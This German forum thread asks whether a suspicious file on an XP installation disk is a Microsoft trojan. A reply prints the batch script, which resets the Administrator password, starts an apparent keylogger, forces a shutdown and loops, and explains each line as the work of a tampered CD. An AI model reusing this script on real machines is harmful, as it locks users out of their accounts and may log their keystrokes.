Archiv Windows XP 25.916 Themen, 128.567 Beiträge

Hat Microsoft bei XP einen Trojaner/keylogger mitinstallier?

Jacky4 / 17 Antworten / Flachansicht Nickles

Hallo Leute

Habe heute mal meinen Alten PC wieder fertig machen wollen und ne falsche Festplatte genommen. wollte eigendlich ne andere nehmen und diese für daten. Hatte aber schon die Installations Dateien raufkopiren lassen. Also habe ich die HDD an meinem derzeitigen PC angeschlossen und wollte die Platte formatieren.
Um zu sehen ob Windows sie erkannt hatte, ging ich in den Arbeitsplatz (da es mich schon ne zeitlang intereessiert, habe ich mir auch mal alle daten zur Installation angesehen). Dort entdeckte ich nun eine Datei die mich irgendwie Stuzig machte.
Habe hier nen Bild davon: http://www.bilder-hochladen.net/files/6nf5-1-png.html
Jetzt frage ich mich natürlich: Warum steckt Microsft solche Dateien zu den Inastallations Dateien, warum überhaupt soclche Dateien? Am wesentlichen ist aber für mich, ist das bei allen XP Professional Installationen so(dann währe mein derzeitiger PC auch betroffen)
bitte um Rat/Hilfe
mfg Jacky

dalai shrek3 „So 100 -ig kann ich das auch nicht auflösen. Es hat aber etwas mit dem...“
Optionen

Das geht schonmal in eine gute Richtung, aber trotzdem muss es entweder eine Recovery, eine selbstgebaute oder verseuchte CD sein. Auf keiner meiner XP-CDs ist das Zeug enthalten und ich sehe auch keinen Sinn dahinter.
Hier mal der Inhalt der Batch, damit alle sehen, worum es geht:

-------------------------------------------------------
@echo off & setlocal
shutdown -s -d 15
:A
set "KontoAlt=Administrator"
set "PWNeu=Microsoft"
net user %KontoAlt% "%PWNeu%"
echo I say to Microsoft: I hate this job. Jason
start EXPLORER
start khook.bat
start label.exe
start KHwertLogg.exe
goto: A
----------------------------------------------------

Am lustigsten finde ich den ersten Befehl: der ist falsch, weil Windows lediglich eine Hilfe zum Befehl shutdown ausgibt.
Dann wird dem vorhandenen Adminkonto ein neues Passwort Microsoft verpasst.
Danach wird ein Explorer gestartet - wozu?
Dann folgt rekursiv der Aufruf der Batchdatei selbst - wozu?
Dann wird das Programm label gestartet, mit dem man einen Datenträger benennen kann, aber Schaden anrichten kann man damit auch nicht (schon gar nicht, wenn es ohne Eingabedatenstrom gestartet wird).
Was das Programm KHwertLogg.exe macht, darüber kann ich nur spekulieren.
Am Ende wird der ganze Kram wiederholt, so dass alles 1. in einer Schleife in derselben Konsole endlos wiederholt wird und 2. jede Wiederholung eine neue Instanz der Batch startet.

Was damit erreicht werden soll, ist mir unklar. Was aber mit Sicherheit passiert (aus Spaß in einer VM probiert): der Speicher wird immer voller und damit irgendwann knapp, aber wozu? Dazu müsste man wohl wissen, was die EXE tut.

EDIT:
Gewollt ist wahrscheinlich das Runterfahren des Systems (deswegen der Shutdown) und eine unmittelbar vorher durchgeführte Passwortänderung des Administrators.
Das hätte zur Folge, dass sich der User nicht mehr am System (mit dem gewohnten Passwort) anmelden kann.

MfG Dalai